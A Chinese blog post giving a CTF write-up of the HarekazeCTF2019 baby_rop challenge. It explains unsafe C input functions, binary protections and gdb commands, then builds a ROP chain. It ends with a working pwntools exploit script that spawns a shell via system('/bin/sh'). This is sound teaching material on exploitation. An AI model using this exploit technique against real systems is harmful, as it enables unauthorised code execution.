PWN-栈溢出

已于 2024-08-26 15:33:21 修改
阅读量1k 收藏 23
点赞数 26
分类专栏: 逆向漏洞分析 文章标签: 安全
于 2024-08-26 15:31:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/GalaxySpaceX/article/details/141561996
版权

前言:

测试文件HarekazeCTF2019_baby_rop,一个典型的栈溢出

静态分析:

首先静态分析下代码,反汇编后可以看到如下代码

漏洞点很明显,位于第8行scanf方法

scanf函数称为格式输入函数,即按用户指定的格式从键盘上把数据输入到指定的变量之中。

为什么这么确定,这里就需要了解一些常见的存在溢出风险的函数,以下列出四个常见的存在风险的函数

  1. gets(char *s):

    • 这个函数从标准输入读取一行数据,直到遇到换行符或文件结束符。
    • 它没有检查输入数据的长度是否超过了目标缓冲区的大小,容易造成缓冲区溢出。
    • 因此,gets() 函数被认为是不安全的,已经在 C11 标准中弃用,应该改用更安全的 fgets() 函数。

  2. scanf(const char *format, ...):

    • 这个函数从标准输入读取数据,根据格式字符串进行解析。
    • 如果格式字符串中使用了不安全的格式化指令,如 %s 没有指定最大长度,就可能导致缓冲区溢出。
    • 应该使用更安全的 fgets() 或 fscanf() 函数,并且格式化指令要指定最大长度。

  3. strcpy(char *dest, const char *src) 和 strcat(char *dest, const char *src):

    • 这两个函数分别用于复制和连接字符串,不会检查目标缓冲区的大小。
    • 如果源字符串的长度超过了目标缓冲区,就会发生缓冲区溢出。
    • 应该使用 strncpy() 和 strncat() 函数,并指定最大复制/连接长度。

  4. sprintf(char *str, const char *format, ...) 和 vsprintf(char *str, const char *format, va_list ap):

    • 这些函数用于格式化输出字符串,不会检查目标缓冲区的大小。
    • 如果格式化后的字符串长度超过了目标缓冲区,就会发生缓冲区溢出。
    • 应该使用 snprintf() 和 vsnprintf() 函数,并指定目标缓冲区的最大长度。

既然确定了风险点,就要确定如何利用,正常情况就是淹没返回值为我们的地址达到执行任意代码的方法,

这里有两种方法:

第一种简单点就是通过构造\bin\sh给system达到执行命令的方案

第二种就是直接将恶意代码放在栈中,然后跳转到栈中执行我们的恶意代码

第三种就是找到程序中存在可以执行命令的后门方法进行调用。

下面就根据动态分析和对程序安全策略分析来确定怎么处理

动态分析:

动态分析第一步就是看看到底用了什么保护策略

看下程序保护有NX,方案2不能使用,具体的安全策略解释如下:

  1. RELRO:RELRO会有Partial RELRO和FULL RELRO,如果开启FULL RELRO,意味着我们无法修改got表
  2. Stack:如果栈中开启Canary found,那么就不能用直接用溢出的方法覆盖栈中返回地址,而且要通过改写指针与局部变量、leak canary、overwrite canary的方法来绕过
  3. NX:NX enabled如果这个保护开启就是意味着栈中数据没有执行权限,以前的经常用的call esp或者jmp esp的方法就不能使用,但是可以利用rop这种方法绕过
  4. PIE:PIE enabled如果程序开启这个地址随机化选项就意味着程序每次运行的时候地址都会变化,而如果没有开PIE的话那么No PIE (0x400000),括号内的数据就是程序的基地址 
  5. Stripped 指的是从可执行文件中移除一些调试信息和符号信息,值为 Yes, 表示该二进制文件已经被 "stripped" 过,移除了一些调试信息

那我们就只能采用第一种构造rop利用system执行命令或者查看项目中是否存在后门方法可以直接利用

对内部方法分析发现没有函数内部存在调用命令执行方法函数,这样我们只能使用第一种方法

下面我们先看看我们需要淹没多少位才能控制eip

这里需要注意我这里使用pwndbg存在bug无法执行输入方法,不过不影响,修改.gdbinit不适用pwndbg,直接使用为加载插件的gdb一样

这里列一些常用的gdb命令

# 开始运行程序
(gdb) r/run       
# 继续运行      
(gdb) c/continue        

# 下一行,不进入函数调用
(gdb) n/next         
# 下一行,进入函数调用   
(gdb) s/step         
# ni和si区别同上   
(gdb) ni/si         
# 执行到返回
(gdb) finish 

# 在第linenum行或function处设置断点
(gdb) b/break linenum/func   
# 清楚指定断点
(gdb) delete 1
# 查看断点 
(gdb) i b

# 观察值是否有变化   
(gdb) watch <expr>              

# 打印当前的啊还能输调用栈的所有信息
(gdb) bt/backtrace     
# 当n为正数,打印栈顶n层。为负数,打印栈低n层     
(gdb) bt/backtrace <n>      

# 查看指定寄存器
(gdb) p $eip
# 查看指定地址内容
(gdb) print (char*) address
# 查看寄存器状态(除浮点寄存器)
(gdb) info registers     

# 显示当前栈帧的详细信息
(gdb) info frame

# 查看指定地址汇编
(gdb) display/i $pc
(gdb) disassemble main

# 内存地址查找字符串
info proc mappings
find 0x601000 , 0x602000, "/bin/sh"

# 设置内容
set *0x7fffffffdf20=0x40121f


# 查看指定内存地址内容
x 按十六进制格式显示变量。
d 按十进制格式显示变量。
u 按十进制格式显示无符号整型。
o 按八进制格式显示变量。
t 按二进制格式显示变量。
a 按十六进制格式显示变量。
i 指令地址格式
c 按字符格式显示变量。
f 按浮点数格式显示变量。

b表示单字节,
h表示双字节,
w表示四字节,
g表示八字节

(gdb) x /50xg 0x7fffffffdc00

下面首先下断点到main方法: b main 或 b *0x4005da

为了只管的看到返回地址,我们直接在返回处设置断点,即 ret:b *0x40061a

下面查看下寄存器和栈信息,发现指向0x7fffffffdd08 

 

这样可以打印下栈内容,这里需要向上多打印些:x /100xg 0x7fffffffdc00

可以看到返回地址为0x7fffffffdd08 -> 0x00007ffff7defc8a ,为返回地址

并且可以看到我们的输入地址为0x7fffffffdcf0,到0x7fffffffdd08

所以这里我们只要有超过24个字符就会破坏返回地址,那么如何构造我们的rop,这里需要了解linux64位的调用约定:

linux64位和32位虽然使用的都是 System V AMD64 ABI 调用约定,但是参数使用寄存器有区别

64位:前 6 个整型参数通过寄存器rdi、rsi、rdx、rcx、r8、r9传递。

32位:前 3 个参数分别存放在 ebx、ecx、edx 寄存器中。第 4 个及之后的参数需要压入栈中

所以我们调用任何方法,我都都需要将参数根据个数依次压入 rdi、rsi、rdx、rcx、r8、r9,对程序分析发现使用system是最简单,利用system只需要调用'/bin/sh'、'sh'、$(0)三个任意一个即可,这里我们对项目查看发现存在/bin/sh

strings -a -t x HarekazeCTF2019_baby_rop | grep bin

这里看到位于1048,这里为低地址,可以直接去ida里找对应的地址,或者去搜索

执行如下命令:

info proc mappings
find 0x601000 , 0x602000, "/bin/sh"
print (char*) 0x601048

可以看到0x601048地址下为字符串/bin/sh

下面就要找到对应的rop,由于我们利用的是system方法,只要找到设置rdi值为0x601048的rop链就好,这里使用rop找pop的指令

0x0000000000400683符合我们的需要,直接pop栈内容到rdi然后ret结束,下面我们可以构造我们的调用方法,具体过程如下:

  1. 首先溢出返回地址到rop地址,即0x0000000000400683
  2. 执行0x0000000000400683代码会pop rdi,会把我们输入内容pop到rdi,这里我们需要pop的地址为0x601048
  3. 最后执行ret,这个时候我们需要调用的地址为system,即0x004005e3,就可以利用system

下面我们根据上述构造我们的代码如下:

from pwn import *

#context.log_level = 'debug'

pop_rdi_ret = 0x400683
bin_sh_addr = 0x601048
system_addr = 0x4005e3

payload = b'a' * 24 + p64(pop_rdi_ret) + p64(bin_sh_addr) + p64(system_addr)

#p = process('./HarekazeCTF2019_baby_rop')
p = remote('127.0.0.1', 10000)

p.recvuntil('name? ')
p.sendline(payload)
p.interactive()

创建转发

socat tcp-listen:10000,reuseaddr,fork EXEC:./HarekazeCTF2019_baby_rop,pty,raw,echo=0

执行poc成功获取shell 

结尾:

一个很典型的栈溢出例子,只是简单的不会设置 NX,那样直接可以将攻击代码放在栈中,然后返回地址到栈即可,但是这里开启了NX,我们只能使用rop找到一个跳转地址通过system达到执行命令获取shell的目的

GalaxySpaceX
关注
专栏目录
CTFshow-PWN入门-栈溢出pwn35~pwn40
weixin_63576152的博客
08-22 1253
本文主要详解CTFshow中pwn入门系列的栈溢出模块的前6题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope参考文章:以下操作中小编用的都是自己的kali环境。
浅谈PWN基础-栈溢出
qq_45751349的博客
04-04 736
一、预备知识 缓冲区溢出简单介绍 缓冲区溢出:简单的说,缓冲区溢出就是超长的数据向小缓冲区复制,导致数据超出了小缓冲区,导致缓冲区其他的数据遭到破坏,这就是缓冲区溢出。而栈溢出是缓冲区溢出的一种,也是最常见的。只不过栈溢出发生在栈,堆溢出发生在堆,其实都是一样的。 二、简介栈 栈:栈是一种计算机系统中的数据结构,它按照先进后出的原则存储数据,先进入的数据被压入栈底,最后的数据在栈顶,需要读数据的时...
9.pwn 栈溢出(基本ROP)
2301_80361487的博客
07-08 955
函数中的存储在栈中的局部变量数组边界检查不严格发生越界写,造成用户输入覆盖到缓冲区外的数据内容,由于栈中同时存在着与函数调用参数的相关信息,栈溢出可以导致控制流劫持。
buu pwn刷题——分类题型1——gets溢出无脑填充
苗_的博客
09-07 1121
gets漏洞 gets从标准输入设备读字符串函数,其可以无限读取,不会判断上限,以回车结束读取,所以应该确保buffer的空间足够大,以便在执行读操作时不发生溢出。 栈结构: (图自ctf-wiki) warmup_csaw_2016 找到gets漏洞,v5到rbp有0x40的内存 无脑填充即可:'a' * 0x40 + 'b' * 8 + p64(0x40060d) exp #!/usr/bin/python from pwn import * r = remote('no
【七日打卡】Pwn栈溢出利用详解
阿道夫的博客
12-22 1010
🖥栈是汇编语言中的一种数据结构,遵循LIFO(Last in Fist Out)原则,即后进先出。压栈(Push)、出栈(Pop)。📌注意:栈从高地址向低地址存储。
[pwn入门] 1. get函数缓冲区溢出
weixin_34092370的博客
01-17 697
查看保护 寻找漏洞 ida打开elf文件: gets函数存在缓冲区溢出漏洞,我们可以通过超长的字符串来覆盖缓冲区,从而修改ROP。为了达到这个目的,我们需要首先计算,输入的&s的堆栈地址位置距离堆栈的底部ebp的位置。Ebp的下一个地址,就是记录了返回地址的位置 s距离返回地址的偏移 gdb打开,并设置断点。 $esp ...
测试一道pwn题_多漏洞组合-堆栈格式化
Jc
01-20 450
checksec机制和file信息 Arch: i386-32-little RELRO: Full RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) ./babyrop: ELF 32-bit LSB executable, I...
pwn小白入门 装载 笔记
小白垃圾笔记2
02-03 496
由于动态链接是由动态链接器在程序加载的时候进行的,当需要时定位的符号(函数库)多了之后,势必会影响性能。弊端是链接的文件过多时输出的可执行文件会非常零散。段的装载地址和空间以页为单位,不足一页的也会占用一页,这样会造成内存空间的浪费。延时绑定:当函数第一次被调用的时候动态链接器才会进行符号查找、重定位等操作,如果没有被调用就不绑定。讲不同的目标文件相同的属性合并成一个节。动态链接是链接的时间是在程序运行或加载的时候,动态链接只载入目标文件,所调用的库被共享。在内存中完成链接的过程。链接的时间是运行之前。
pwn--栈迁移
weixin_44642009的博客
04-17 1000
栈迁移–ROP 本次实验我们使用lab4的可执行文件。 在开始之前我们需要明确一些问题以及需要注意的地方,以下我会讲到,这也是在实验过程中我碰到的一些情况和解题关键: 为什么使用栈迁移? 由上图可知,程序开辟的堆栈大小是0x50字节,而read函数输入可以输入0x60字节,明显存在栈溢出的可能,不过可输入的字节数不是足够多,空间较小,不足以使我们填入足够的ROP链,所以我们需要栈迁移。 ...
CTF PWN简单栈溢出
2301_81031055的博客
01-25 484
(mov esp,ebp)意思是先将ebp赋给esp,此时esp与ebp位于同一个地址,可以把它们现在指向的那个地址,既可以当成栈顶又可以当成是栈底。因为填充的数据后面跟的就是栈,所以它会将栈地址顺带打印出来,接下来我们继续编写脚本。到这里,我们的第一次输入就算完成了,在第二次输入的时候就能去构造payload。(此时栈顶的内容也就是ebp的内容,也就是说现在把ebp的内容赋给了esp)在这里我们发现有system函数,我们可以利用system函数的plt表。我们会发现溢出字节较少,考虑用栈溢出解题。
gdb 查看是否 栈溢出_入坑 CTF-PWN栈溢出入门
weixin_36064196的博客
01-17 770
好久没看过pwn题目了,写一个入门的教程顺便复习了:1. 安装gdb-pedagit clone https://github.com/longld/peda.git ~/pedaecho "source ~/peda/peda.py" >> ~/.gdbinitecho "DONE! debug your program with gdb and enjoy"2. 一些比较有用的技巧...
pwn -----gets 漏洞的利用
qq_41071646的博客
12-29 2111
其实做pwn题是有一段时间了  但是因为复习以及学习驱动 所以没有什么时间写博客  然后这一次写一个pwn的题  这个题 还是很简单的    先用ida 看一下 发现了 我们这个题 有明显的利用漏洞 gets  然后 我们发现了  有srand 是要确定随机种子 那么 如果 我们 把这个种子 给覆盖掉  那么我们就可以 算出随机数 直接 得到flag   在 调试下 发现了   然后...
第一个PWN 栈溢出简单题
qq_41696518的博客
06-16 1151
第一个pwn 栈溢出简单题
PWN简单堆栈溢出漏洞利用(二)
SkYe's Blog
08-12 798
PWN简单堆栈溢出漏洞利用(二) 题目来源 下载链接(密码akcz) 题目需要读取flag文件才能正确显示出flag,也就是下文中显示的 This is flag 创建办法: 在/home/pwn/pwn1目录下创建一个名为flag文件,打开并写入This is flag 1. 运行程序、查看文件类型、保护措施 程序让我们输入一段字符串,并返回我们所输入的内容。 看到是一个 32位 动态链...
栈溢出攻击的理解
a363344923的专栏
12-08 1340
栈溢出攻击首次提出是在1996年,Aleph One发表了一篇名为Smashing the stack for fun and Profit的文章。介绍了一种在Linux/Unix系统,利用缓冲区溢出的方式来攻击目标程序来改变程序的执行方式的技术。该文章将以前看起来高大上的缓冲区溢出用浅显易懂的方式表达出来,立刻引起了安全界的强烈反应。   下面记录一下我对缓冲区溢出攻击的理解。 首先需要一点
CTF--pwn栈溢出漏洞)
q759451733的博客
05-27 4595
0x00 工具介绍 * Ubuntu系统(kali也可以) * gdb-peda 这个是神器,二进制分析必备神器 0x01 程序源码 #include <stdio.h> #include <string.h> #include <stdlib.h> int main(int argc, char * argv[]) { char buf[4...
部标主动安全(ADAS+DMS)对接说明
谁念西风独自凉
09-27 760
上一篇介绍了,这里说一下如何对接主动安全附件服务器。流媒体的对接主要牵扯到4个方面:(1)平台端:业务端系统,包含前端呈现界面。(2)JT/T808网关:部标设备接入网关,这个是非常重要的,是设备与平台进行数据交换的桥梁,流媒体相关的指令操作也必须依赖它完成。(3)部标视频机:符合JT/T808协议的车载视频机器。(4)流媒体服务:符合苏标、粤标、川标、陕标协议的主动安全附件服务,接收文件流,并存储。
【蚂蚁HR-注册/登录安全分析报告】
最新发布
09-28 1191
蚂蚁社保是武汉微蚁企业服务有限公司旗下的网站,主要提供五险一金的代缴、补缴、社保开户、社保挂靠和社保代理服务。该平台主要覆盖一二线城市,目前已覆盖13+城市。蚂蚁社保的特点是高度自动化和在线化,创始人团队致力于通过程序和硬件替代所有可以自动化的环节,从而最大限度地减少人为错误,作为头部的社保代缴平台, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。
pwn+栈溢出解题思路
11-10
栈溢出是一种常见的漏洞,攻击者可以通过利用栈溢出漏洞来执行恶意代码。pwn是一种利用栈溢出漏洞的攻击方式,通常用于CTF比赛中。下面是一些pwn解题思路的步骤: 1. 找到漏洞:首先需要找到程序中的漏洞,通常是栈溢出漏洞或格式化字符串漏洞。 2. 利用漏洞:利用漏洞来执行恶意代码,通常是通过覆盖返回地址或修改函数指针来实现。 3. 获取shell:利用漏洞执行恶意代码后,需要获取shell来进一步控制系统。可以通过调用system函数来执行shell命令。 4. 获取函数地址:在一些情况下,需要获取函数的地址来执行攻击。可以通过泄露函数地址或者使用动态链接库来获取函数地址。 5. 绕过保护机制:现代操作系统通常会有一些保护机制来防止pwn攻击,例如栈随机化、地址空间布局随机化等。攻击者需要找到绕过这些保护机制的方法。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值